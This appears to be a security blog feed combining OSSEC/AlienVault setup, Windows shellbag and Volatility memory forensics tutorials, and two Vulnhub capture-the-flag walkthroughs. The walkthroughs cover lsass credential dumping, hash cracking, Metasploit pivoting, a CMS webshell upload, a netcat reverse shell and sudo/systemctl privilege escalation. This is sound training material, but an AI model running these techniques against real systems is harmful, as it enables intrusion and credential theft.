·         Enable system integrity check.

·         Enable rootkit detection.

·         Enable or disable active directory response.

·         Once you are done with defining the default options, proceed to install the OSSEC agent by pressing ENTER

·         Then after press ENTERto close the installer as shown below



Deploying OSSEC agent to AlienVault server

 

In manner the agent to communicate with the server

 

·         You need to first add it to the HIDS server or AlienVault server

·         After that extract, the agent authentication key from the AlienVault server

 

To extract agent key from server, go to the AlienVault Web UI and then navigate to Environment > Detection as shown below: -



 

Then select or add Agent where you installed OSSEC agent and then extract or copy the key as shown below



 

Once you have extracted the key, Import the key on the agent simply by running the following command: -

 

/var/ossec/bin/manage_agents

 

Enter I, paste the key that you copied from AlienVault Web UI and confirm adding the key then exit from the window by pressing Q as shown below



 

Running OSSEC agent

Once the installation completes start the OSSEC agent simply by running the following command:

 

/var/ossec/bin/ossec-control start

Or

systemctl start ossec

 



 

To stop the agent run the below command

 

/var/ossec/bin/ossec-control stop

Or

systemctl stop ossec

 

Other service control commands are described below.

 

/var/ossec/bin/ossec-control          {start|stop|reload|restart|status}

 

To check the status.

 

/var/ossec/bin/ossec-control status

 



 

check the logs to see if the agent has connected to the server.

 

tail -f /var/ossec/logs/ossec.log

 



 

As you can see the agent is successfully connected to the AlienVault server

Congratulations !!! you have successfully deployed your Ubuntu machine to the AlienVault server

 

For windows machine

 

Download OSSEC agent for Windows

You can download the OSSEC agent for windows from the OSSEC official page

Locate and select package Agent Windows ossec-agent-win-32-3.6.exe or the latest one as shown below:

 



Install OSSEC agent

 

Go to the Downloads and run the OSSEC agent installer and hit next as shown below 

 



 

Choose the path where you want to install the OSSEC agent and hit install

 



 

Further then wait for the setup completion and then hit next

 



 

Select finish and then exit from the installer.



 

Generate OSSEC key for the agent

 

Follow the steps as described below:

·         At AlienVault Web UI go to “Environment > Detection > HIDS”

·         Go to Agents (top right corner)

·         Add a new agent

·         Copy the key and use it at agent as shown below

 



Come back to the windows machine

Enter the AlienVault server IP and paste the key as shown below



 

After that confirm agent deployment by pressing ok

 



 

Run and verify OSSEC agent is connected or running

 

After successful deployment of OSSEC agent start service of OSSEC agent by navigating to “Manage > Start OSSEC” as shown below



 

As you can see server is started successfully



 

A new windows service can be found at OSSIM Web UI as shown below

Congratulation !!! you have successfully deployed your windows agent to the AlienVault server.

 



Hmm…

Let’s verify it checking the logs of windows machine it is processing or not by navigating to “Analysis > Security Events (SIEM)”

 



 

Where 192.168.1.7 is my windows machine IP

As we can see the windows machine started sending the processing logs.

 

Hold tight! this is not enough…..

Have patience …

In this article, we explained the Deployment of OSSEC agent to AlienVault OSSIM.

In the next article, our focus will be on the Threat Hunting, Malware analysis, network traffic monitoring, and much more…

 

HA: Forensics: Vulnhub Walkthrough

$
0
0

Introduction

Today we are going to crack this vulnerable machine called HA: Forensics. This is a Capture the Flag type of challenge. It contains FOUR flags that are accessible as the solving of the lab progresses based on hints. It is a Forensics focused machine.

Download Lab from here.

 Penetration Testing Methodology

·         Network Scanning

o   Netdiscover

o   Nmap

·         Flag #1

o   Browsing the HTTP service

o   Directory Bruteforce using dirb

o   Enumerating an Image file

o   Extracting Metadata of Image file

o   Reading Flag #1

·         Flag #2

o   Directory Bruteforce using dirb

o   Decrypting PGP Encryption

o   Creating a Dictionary using crunch

o   Performing a Dictionary on ZIP file

o   Reading Flag #2

·         Flag #3

o   Enumerating DMP file using pypykatz

o   Extracting an NT hash

o   Cracking Hash using John the Ripper

o   SSH login using Metasploit

o   Convert SSH to Meterpreter

o   Enumerating Network Interfaces

o   AutoRoute an internal docker instance

o   Perform a ping sweep scan internally

o   Connect to the FTP service as Anonymous

o   Downloading the Image file

o   Transferring the Image file to the local machine

o   Analyze the image file using Autopsy

o   Reading Flag #3

·         Flag#4

o   Decoding the Base64 Encryption

o   Enumerating for Sudo permission

o   Exploiting the Sudo permissions on ALL

o   Reading Flag #4

Walkthrough

Network Scanning

To attack any machine, we need to find the IP Address of the machine. This can be done using the netdiscover command. To find the IP Address, we will need to co-relate the MAC Address of the machine that can be obtained from the Virtual Machine Configuration Setting. The IP Address of the Machine was found to be 192.168.0.174.

netdiscover



Following the netdiscover scan, we need a nmap scan to get the information about the services running on the virtual machine. An aggressive nmap scan reveals that 2 services: SSH (22) and HTTP (80) are running on the application.

nmap  -A 192.168.0.174

 


Enumeration

Since we have the HTTP Service running on the virtual machine, let’s takes a look at the webpage hosted:

http://192.168.0.174



The webpage says a button that says “Click here to get flag!”. Make sure to click that.

FLAG #1

We see the webpage is a simple page with some forensics images. Nothing special. Next on the Enumeration tasks was Directory Bruteforce. We used our reliable dirb tool for the directory bruteforce.

dirb http://192.168.0.174/



This gave us an image directory. We looked into it through the Web Browser and found two images called DNA and fingerprint. We checked DNA it was just a rabbit hole. Then we downloaded the fingerprint.jpg file to the local system to further analyze it.

 



This machine is based on Forensics and we have an image at our hands, Exiftool seems the right tool to use. Upon a simple look at the metadata of the image using Exiftool, we see that we have our First Flag!

exiftool fingerprint.jpg



Flag #2

Now, Enumeration doesn’t always end with the one version of Directory Bruteforce. When in doubt, always use the Extension filter on the dirb. We got a hit on the txt filter and we have some tips.

dirb http://192.168.0.174 -X .txt



Looking at the tips.txt we see that it is a kind of robots.txt file just named tips. As we are on the hunt for flags, we choose to browse the flag.zip file first.



It gave us an option to save the file. Let’s do it.



Now that we have the zip file on our local system, its time to extract the contents of this file. We use the unzip command to extract the files inside the flag.zip file. It requires a password. We don’t have one!!



We go back to the Web browser and the tips file. Here is a folder named igolder. It resembles a website that encrypts and decrypts public and private key messages. We browse the folder and see that there is another text file called clue.txt. Upon reading the file we see that it is a combination of a private key and a message.

http://192.168.0.174/igolder/clue.txt



To decrypt the message, we went on the igolder website and pasted the PGP Private Key and the Encrypted message from the clue.txt file. After clicking the Decrypt Message button, we have the secret message. It says to us that the password is 6 characters, with the first 3 being letters “for” and the last 3 being numeric characters.



Whenever we are in a situation where we have some partial hint of the password, we use crunch to create a dictionary fitting to that pattern. We used crunch and created a dictionary for cracking the password named dict.txt. Using fcrackzip we cracked the password to be for007.

We unzip the file and we have a pdf file labeled flag. We also get a DMP file but more on that later.

crunch 6 6 -t for%%% -o dict.txt

fcrackzip -u -D -p dict.txt flag.zip

unzip flag.zip

 



Let’s open the PDF file and take a look at our Second Flag



Flag #3

Now, we have 2 flags, 2 more to go. We received a DMP file from the previous section. In forensics, a dump file can be inspected using pypykatz. So, we will use it to check for some hints inside.

pypykatz -lsa -k /root/Downloads minidump lsass.DMP



Looking at the DMP file a bit thoroughly and we find an NT hash file for a user called jasoos. It means a detective in Hindi. That might be a clue.



We copy the has and paste it inside a file named hash. Now we have a hash file and to crack that hash we need John the Ripper. After churning through, John the Ripper gave us the password. It was “Password@1”. That’s not super secure, is it?

john –format=NT hash



Now, here we can directly connect via SSH but logging in using Metasploit is better as it has a ton of post-exploitation tools that can be used afterward. Hence using the ssh_login module we get an SSH session on the machine as user jasoos. Using the shell_to_meterpreter script we got ourselves a meterpreter session on the target machine.

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.174

set username jasoos

set password Password@1

exploit

session -u 1

 



Using the ifconfig command, we see that there is a docker interface running on the application with an IP Address 172.17.0.1

It is an internal IP address; means we cannot access it from outside normally.

sessions 2

ifconfig



No need for Panic. Metasploit has our back here. It has an autoroute exploit that can route the network in such a way that internal IP is accessible from outside. The autoroute will create a new host to connect with whose traffic will be redirected to the internal service. But, Autoroute doesn’t tell us the IP Address of the new host. So, we need to perform a ping sweep to find that particular IP Address which can be used to further exploit the target. Ping sweep gives us the IP address. It is 172.17.0.2.Now that we know the target IP Address, let’s see exactly what kind of service is this docker instance running at this moment. A Port scan reveals that it is an FTP service. But this service is unknown to us. We don’t have any credentials for us. But there is a feature in FTP service where an anonymous user can log in and access the files through the FTP. To confirm if this FTP has that kind of configuration, we use the ftp anonymous scanner in Metasploit.

use post/multi/manage/autoroute

set session 2

exploit

use post/multi/gather/ping_sweep

set session 2

set rhosts 172.17.0.0/24

exploit

use auxiliary/scanner/portscan/tcp

set rhosts 172.17.0.2

set port 1-100

exploit

use auxiliary/scanner/ftp/anonymous



It says that ftp allows anonymous service. So, let's enumerate the FTP service by connecting to it as anonymous. We have a directory called pub. Inside that directory, we have a file with a 001 extension. It seems to be an image file that is usually used in forensic investigation. It is labeled sabot which is known as saboot. It means Evidence in Hindi.

shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

ftp 172.17.0.2

anonymous

ls

cd pub

ls

get saboot.001



Now using the Python One liner HTTP service we transfer the file from the target machine to our local machine.

exit

ls

python -m SimpleHTTPServer



As the Python One liner runs and provides the service at port 8000, we browse that port and get our saboot file.

http://192.168.0.174:8000



We decided to use the Autopsy Forensic Investigation tool to inspect the image captured. It can be started using the following command. It tells us that the Autopsy is accessible on localhost port 9999. Let’s open it.



Here, we have a Web Interface for the Autopsy. We click on the New Case button



We name the Case, Provide the description, and give the Investigator name for the documentation purposes. And again, click on the New Case button.



Now it creates a case. After creating a case, it requires a host for that particular case. It asks for the name of the host. After providing the name click on the Add Host button to continue.



After the creation of the host, it asks us to add an image file. This is the step where we add the image file, we acquired from the target machine.



It asks for the location of the image file. Since we downloaded it from our Web Browser, it must be in the Downloads folder. We provide the path as shown in the image below. Also, choose the Partition in the Type option. As it is a partition, otherwise it would be quite bigger. Disks are bigger than partitions. After completing, click on the Next button to continue.

 


Here it asks for further options. Let them be the default and click on the Add button.



Now that our image has been mounted. It is time for Analyse-it. This can be done as shown in the image below.



We see that we have a bunch of files. Among those files, we have 2 text files. A flag file and a creds file. Let’s take a look at our Third Flag.



Flag #4

Now, we have a creds.txt file. We take a look at it to find that there is some encrypted text inside it. 



It seems like it is a Base64 encoding. We use the echo command with a base 64 decoder as shown in the image below. This might be the password for another user.

 


We enumerate the home directory and found that there is another user by the name of forensics. The password must be for this user. We use the su command to login as forensic and the password we found. Now we use the sudo -l command to find what kind of binaries we can use to elevate privileges. We find that ALL is permitted. So, we just use the sudo bash command and get the root. Then look for the final flag in the root directory and we have our fourth and final flag.

cd /home

ls

su forensics

jeenaliisagoodgirl

sudo -l

sudo bash

cd /root

cat root.txt



This concludes this vulnerable machine.

Forensic Investigation: Shellbags

$
0
0

In this article, we will be focusing on shellbags and its forensic analysis using shellbag explorer. Shellbags are created to enhance the users’ experience by remembering user preferences while exploring folders, the information stored in shellbags is useful for forensic investigation.

Table of Contents

·         Introduction

·         Location of shellbags

·         Forensic analysis using Shellbags Explorer

·         Active Registry Analysis

·         Offline Registry Analysis

 

 Introduction

Windows Shell Bags were introduced into Microsoft's Windows 7 operating system and are yet present on all later Windows platform. Shellbags are registry keys that are used to improve user experience and recall user’s preferences whenever needed.The creation of shellbags relies upon the exercises performed by the user.

As a digital forensic investigator, with the help of shellbags, you can prove whether a specific folder was accessed by a particular user or not. You can even check whether the specific folder was created or was available or not. You can also find out whether external directories have been accessed on external devices or not.

For the most part, Shell Bags are intended to hold data about the user's activities while exploring Windows. This implies that if the user changes icon sizes from large icons to the grid, the settings get updated in Shell Bag instantly.At the point when you open, close, or change the review choice of any folder on your system, either from Windows Explorer or from the Desktop, even by right-clicking or renaming the organizer, a Shellbag record is made or refreshed.

Location of shellbags

Windows XP

The shellbags for Windows XP are stored in NTUSER.DAT

·         Network folders references:\Software\Microsoft\Windows\Shell

·         Local folder references: \Software\Microsoft\Windows\ShellNoRoam

·         Removable device folders: \Software\Microsoft\Windows\StreamMRU

Windows 7 to Windows 10

Shellbags are a set of subkeys in the UsrClass.dat registry hive of Windows 10 systems. The shell bags are stored in both NTUSER.DAT and USRCLASS.DAT.

·         NTUSER.DAT: HKCU\Software\Microsoft\Windows\Shell

·         USRCLASS.DAT: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell

The majority of the data is found in the USRCLASS.DAT hive-like local, removable, and network folders’ data.

You can manually check shellbags entry in the registry editor like so. In the following screenshot, a shellbag entry for a folder named jeenali is shown.

 



 

The Shellbag data contains two main registry keys, BagMRU and Bags

·         BagMRU: This stores folder names and folder path similar to the tree structure. The root directory is represented by the first bagMRU key i.e. 0.BagMRU contains numbered values that compare to say sub key’s nested subkeys. All of these subkeys contain numbered values aside from the last child in each branch.

·          Bag: These stores view preference such as the size of the window, location, and view mode.


We will be analyzing the shellbags using the shellbag explorer.

1.       ShellBags explorer(SBECmd)

2.       Shellbags explorer (GUI version)

Shellbags explorer is a tool by Eric Zimmerman to analyze shellbags. The shellbags explorer is available in both versions cmd and GUI. You can download the tool from here.

Forensic Analysis of Shellbag

Analysis using SBECmd

Here we are using the SBECmd.exe (Cmd version of the shellbag explorer tool) by Eric Zimmerman. This cmd tool is great for command prompt lovers who prefer using commands over GUI.

To get a clear idea about how shell bags work and store data and how you can analyze it I have created a new folder named “raaj” which consists of a text document. Further, we will be renaming it to geet and then to jeenali. Let’s analyze the shellbags entries for this.



Run the executable file and browse to the directory where the executable is present. To extract the shellbags data into a .csv file use the following command:

SBECmd.exe –l –csv ./



As a result of the above command, a .csv file will be created in the directory.


 

Lets’ open the .csv file and analyze it.


As I mentioned earlier we have renamed the folder named “raaj” to “geet” and further to “jeenali” as highlighted in the screenshot the MFT entry number is the same for all three folders which depict that the folder was renamed. 

v  Shellbags explorer (GUI version)

Active Registry Analysis

Using the shellbags explorer we can also analyze the active registry. Select load an active registry which will load the registry in use by the active user.


 

The shellbags are successfully parsed from the active registry.



The shellbags parsed contains the shellbags entries created based on users’ activities. As depicted earlier the folder renamed will have a similar MFT entry number. I have created a folder named “raaj”, we will be further renaming it to “geet”.


 

Whenever a folder is renamed an entry is stored in shellbag, the MFT entry number of both the folder will be the same.



Now lets’ once again rename the folder to jeenali. The MFT entry will be similar to the previous one.


 

Offline registry analysis

For offline analysis, we first have to extract the shellbags file which is USRCLASS.DAT. Let’s extract the shellbag file using FTK imager. Download FTK imager from here.

Lets’ add in the evidence, go to the add evidence item.



Select the source for adding evidence here I have select the local drive as the usrclass.dat as the



Select the desired user drive. Click Finish.

 


Expand the window to the location of the usrclass.dat.Select the user you want to investigate go to the following path to extract the UsrClass.dat.

root > users > administrator >Appdata>Local>Microsoft>windows

 


 

We will be analyzing the usrclass.dat extracted from the above step using shell bag explorer by Eric Zimmerman.

As we have exported the registry hives we will choose “load offline hive



After successful parsing of the extracted shellbags file, you will be able to see the entries for folders browsed, created, deleted, etc. Here is the entry of the folders renamed earlier, the MFT entry number is the same for the three folders.



Further, I deleted the folder named “jeenali”. Now lets’ check the shellbags data whether the deleted folder still exists. 



Yes, the shellbags store the entry even though the folder was deleted later.


 

Shellbags stores the entries of the directories accessed by the user, user preferences such as window size, icon size. Shellbags explorer parses the shellbags entries shows the absolute path of the directory accessed, creation time, file system, child bags. The tool classifies the folders accessed according to the location of the folder. Shellbags are created for compressed files (ZIP files), command prompt, search window, renaming, moving, and deleting a folder.

Memory Forensics: Using Volatility Framework

$
0
0

Cyber Criminals and attackers have become so creative in their crime type that they have started finding methods to hide data in the volatile memory of the systems. Today, in this article we are going to have a greater understanding of live memory acquisition and its forensic analysis. Live Memory acquisition is a method that is used to collect data when the system is found in an active state at a scene of the crime.

Table of Contents

·        Memory Acquisition

·        Importance of Memory Acquisition

·        Dump Format Supported

·        Memory Analysis Plugins

·         Imageinfo

·         Kdbgscan

·         Processes

·         DLLs

·         Handles

·         Netscan

·         Hivelist

·         Timeliner

·         Hashdump

·         Lsadump

·         Modscan

·         Filescan

·         Svcscan

·         History

·         Dumpregistry

·         Moddump

·         Procdump

·         Memdump

·         notepad

Memory Acquisition

It is the method of capturing and dumping the contents of a volatile content into a non-volatile storage device to preserve it for further investigation. A ram analysis can only be successfully conducted when the acquisition has been performed accurately without corrupting the image of the volatile memory. In this phase, the investigator has to be careful about his decisions to collect the volatile data as it won’t exist after the system undergoes a reboot. The volatile memory can also be prone to alteration of any sort due to the continuous processes running in the background. Any external move made on the suspect system may impact the device’s ram adversely.

Importance of Memory Acquisition

When a volatile memory is a capture, the following artifacts can be discovered which can be useful to the investigation:

·         On-going processes and recently terminated processes

·         Files mapped in the memory (.exe, .txt, shared files, etc.)

·         Any open TCP/UDP ports or any active connections

·         Caches (clipboard data, SAM databases, edited files, passwords, web addresses, commands)

·         Presence of hidden data, malware, etc.

Here, we have taken a memory dump of a Windows7 system using the Belkasoft RAM Capturer, which can be downloaded from here.

Memory Analysis

Once the dump is available, we will begin with the forensic analysis of the memory using the Volatility Memory Forensics Framework which can be downloaded from here. The volatility framework support analysis of memory dump from all the versions and services of Windows from XP to Windows 10. It also supports Server 2003 to Server 2016. In this article, we will be analyzing the memory dump in Kali Linux where Volatility comes pre-installed.

Dump Format Supported

·         Raw format

·         Hibernation File

·         VM snapshot

·         Microsoft crash dump

Switch on your Kali Linux Machines, and to get a basic list of all the available options, plugins, and flags to use in the analysis, you can type

volatility -h

Imageinfo

When a Memory dump is taken, it is extremely important to know the information about the operating system that was in use. Volatility will try to read the image and suggest the related profiles for the given memory dump. The image info plugin displays the date and time of the sample that was collected, the number of CPUs present, etc. To obtain the details of the ram, you can type;

volatility -f ram.mem image info

A profile is a categorization of specific operating systems, versions and its hardware architecture, A profile generally includes metadata information, system call information, etc. You may notice multiple profiles would be suggested to you.



Kdbgscan

This plugin finds and analyses the profiles based on the Kernel debugger data block. The Kdbgscan thus provides the correct profile related to the raw image. To supply the correct profile for the memory analysis, type

volatility -f ram.mem kdbgscan



Processes

When a system is in an active state it is normal for it to have multiple processes running in the background and can be found in the volatile memory. The presence of any hidden process can also be parsed out of a memory dump. The recently terminated processes before the reboot can also be recorded and analyzed in the memory dump. There are a few plugins that can be used to list down the processes

Pslist

To identify the presence of any rogue processes and to view any high-level running processes, one can use

volatility -f ram.mem --profile=Win7SP1x64 pslist -P

On executing this command, the list of processes running is displayed, their respective process ID assigned to them and the parent process ID is also displayed along. The details about the threads, sessions, handles are also mentioned. The timestamp according to the start of the process is also displayed. This helps to identify whether an unknown process is running or was running at an unusual time.



Psscan

This plugin can be used to give a detailed list of processes found in the memory dump. It can not detect hidden or unlinked processes.

volatility -f ram.mem --profile=Win7SP1x64 psscan



Pstree

In this plugin, the pslist is represented with child-parent relationship and shows any unknown or abnormal processes. The child process is represented by indention and periods.

volatility -f ram.mem --profile=Win7SP1x64 pstree

 


 

DLLs

DLLlist

volatility -f ram.mem --profile=Win7SP1x64 dlllist -p 116,788

DLLs stand for Dynamic-link library automatically that is added to this list when a process according to calls Load Library and they aren't removed until. To display the DLLs for any particular process instead of all processes.

 


DLLDump

This plugin is used to dump the DLLs from the memory space of the processes into another location to analyze it. To take a dump of the DLLs you can type,

volatility -f ram.mem --profile=Win7SP1x64 dlldump –dump-dir /root/ramdump/

 


Handles

This plugin is used to display the open handles that are present in a process. This plugin applies to files, registry keys, events, desktops, threads, and all other types of objects. To see the handles present in the dump, you can type,

volatility -f ram.mem --profile=Win7SP1x64 handles

 


Getsids

This plugin is used to view the SIDs stands for Security Identifiers that are associated with a process. This plugin can help in identifying processes that have maliciously escalated privileges and which processes belong to specific users. To get detail on a particular process id, you can type

volatility -f ram.mem --profile=Win7SP1x64 gets its -p 464

 


Netscan

This plugin helps in finding network-related artifacts present in the memory dump. It makes use of pool tag scanning. This plugin finds all the TCP endpoints, TCP listeners, UDP endpoints, and UDP listeners. It provides details about the local and remote IP and also about the local and remote port. To get details on the network artifacts, you can type:

volatility -f ram.mem --profile=Win7SP1x64 netscan



Hivelist

This plugin can be used to locate the virtual addresses present in the registry hives in memory, and their entire paths to hive on the disk. To obtain the details on the hivelist from the memory dump, you can type:

volatility -f ram.mem --profile=Win7SP1x64 hivelist

 


Timeliner

This plugin usually creates a timeline from the various artifacts found in the memory dump. To locate the artifacts according to the timeline, you can use the following command:

volatility -f ram.mem --profile=Win7SP1x64 timeliner



Hashdump

This plugin can be used to extract and decrypt cached domain credentials stored in the registry which can be availed from the memory dump. The hashes that are availed from the memory dump can be cracked using John the Ripper, Hashcat, etc. To gather the hashdump, you can use the command:

volatility -f ram.mem --profile=Win7SP1x64 hashdump



Lsadump

This plugin is used to dump LSA secrets from the registry in the memory dump. This plugin gives out information like the default password, the RDP public key, etc. To perform a lsadump, you can type the following command:

volatility -f ram.mem --profile=Win7SP1x64 lsadump



Modscan

This plugin is used to locate kernel memory and its related objects. It can pick up all the previously unloaded drivers and also those drivers that have been hidden or have been unlinked by rootkits in the system. To

volatility -f ram.mem --profile=Win7SP1x64 modscan



Filescan

This plugin is used to find FILE_OBJECTs present in the physical memory by using pool tag scanning. It can find open files even if there is a hidden rootkit present in the files. To make use of this plugin, you can type the following command:

volatility -f ram.mem --profile=Win7SP1x64 filescan

 


Svcscan

This plugin is used to see the services are registered on your memory image, use the svcscan command. The output shows the process ID of each service the service name, service name, display name, service type, service state, and also shows the binary path for the registered service – which will be a .exe for user mode services and a driver name for services that run from kernel mode. To find the details on the services

volatility -f ram.mem --profile=Win7SP1x64 svcscan


Cmdscan

This plugin searches the memory dump of XP/2003/Vista/2008 and Windows 7 for commands that the attacker might have entered through a command prompt (cmd.exe). It is one of the most powerful commands that one can use to gain visibility into an attacker’s actions on a victim system. To conduct a cmdscan, you can make use of the following command:

volatility -f ram.mem --profile=Win7SP1x64 cmdscan



Iehistory

This plugin recovers the fragments of Internet Explorer history by finding index.dat cache file. To find iehistory files, you can type the following command:

volatility -f ram.mem --profile=Win7SP1x64 iehistory




Dumpregistry

This plugin allows one to dump a registry hive into a disk location. To dump the registry hive, you use the following command.

volatility -f ram.mem --profile=Win7SP1x64 dumpregistry --dump-dir /root/ramdump/

 


Moddump

This plugin is used to extract a kernel driver to a file, you can do this by using the following command:

volatility -f ram.mem --profile=Win7SP1x64 moddump --dump-dir /root/ramdump/



 


Procdump

This plugin is used to dump the executable processes in a single location, If there is malware present it will intentionally forge size fields in the PE header for the memory dumping tool to fail. To collect the dump on processes, you can type:

volatility -f ram.mem --profile=Win7SP1x64 procdump --dump-dir /root/ramdump/

 


Memdump

The memdump plugin is used to dump the memory-resident pages of a process into a separate file. You can also lookup a particular process using -p and provide it with a directory path -D to generate the output. To take a dump on memory-resident pages, you can use the following command:

volatility -f ram.mem --profile=Win7SP1x64 memdump --dump-dir /root/ramdump/



Notepad

Notepad files are usually highly looked up files in the ram dump. To find the contents present in the notepad file, you can use the following command:

volatility -f ram.mem --profile=WinXPSP2x86 notepad

KB-VULN: 3 Vulnhub Walkthrough

$
0
0

Today we are going to solve another boot2root challenge called "KB-VULN: 3".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to Machine. Let's start and learn how to break it down successfully.

Level: Easy

Penetration Testing Methodology

Reconnaissance

·         Netdiscover

·         Nmap

Enumeration

·         SMBClient

Exploiting

·         Cracking backup zip2john & john the ripper

·         SiteMagic CMS - Arbitrary File Upload

Privilege Escalation

·         Abuse uncommon setuid binary systemctl

Capture the flag

 

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX

 

 

So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A –p- 192.168.10.167


 

Enumeration

We accessed the website, but found a 404 error.


 

We check if the site is vulnerable to null SMB connections and list two shares. One of them draws our attention to your comment.

 


 

We enter the "Files" share and list a backup of the website, download it and unzip it, but it is password protected.


Exploiting

We will use zip2john to get the zip password hash.

 


 

We checked the content of the "pass-zip.hash" file and launched john with the rockyou dictionary.

We wait a bit and get the password for the zip.


 

We unzip the zip and see the content of a SiteMagic CMS.

 


 

We reviewed the configuration file "config.xml.php" and enumerated the CMS administrator credentials.


 

This CMS is vulnerable to Arbitrary File Upload: https://www.exploit-db.com/exploits/48788

 

Manually it can also be done in the following way:

 

We access the site's login, authenticate ourselves with the obtained credentials, go to Content and upload a webshell (I used pentestmonkey's webshell)

 


 

We access the directory and see that our webshell has been uploaded.


 

We put a netcat on the wire and run our webshell. We will get access to the machine, now we will execute our two favorite commands to get an interactive shell.

 


 

We access the home page of the user "heisenberg" and have access to read the file "user.txt”.


 

Privilege Escalation (root)

 

After reviewing the contents of the user's home page without anything useful, we execute the "find" command to obtain a list of binaries that we have permission to execute.

 


 

Among these binaries, we find "systemctl". We searched for information about it in Google and found very similar methods, although only this one worked for me:

We create a file "name.service" with the following content:


 

We downloaded in the victim machine our "m3.service" in the directory "/dev/shm" (in the user we don't have permissions and in /tmp/ it didn't work).

 

We put a netcat to the listening and we initiate our service.

 


 

If everything went well, we will get a shell as root. Now we read the root flag.

Viewing all 1824 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>